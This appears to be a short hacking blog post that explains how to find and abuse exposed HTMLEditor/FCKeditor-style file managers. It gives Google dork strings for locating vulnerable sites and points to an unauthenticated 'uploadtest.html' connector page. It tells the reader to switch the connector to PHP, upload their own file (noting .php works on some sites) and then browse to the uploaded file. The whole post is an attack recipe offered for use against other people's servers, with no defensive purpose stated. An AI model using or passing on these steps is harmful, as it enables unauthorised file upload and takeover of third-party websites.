Google Dork : inurl:/HTMLEditor/editor/ 

or "inurl:/HTMLEditor/editor//filemanager/"

or "inurl:/HTMLEditor/editor//filemanager//connectors/"





Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html

or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html





Go here :



http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html


or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

 chnage connectors into PhP (Like FCKeditor) and upload Your file





suppoted files : .TXT and .JPG in some site you can upload .html and .php too





to view you file goto : http://website/PowerCMS%20folder/files/your file here

or http://website/patch//PowerCMS%20folder/files/your file here 


Examples :

Labels: , , , , , ,

Leave a Reply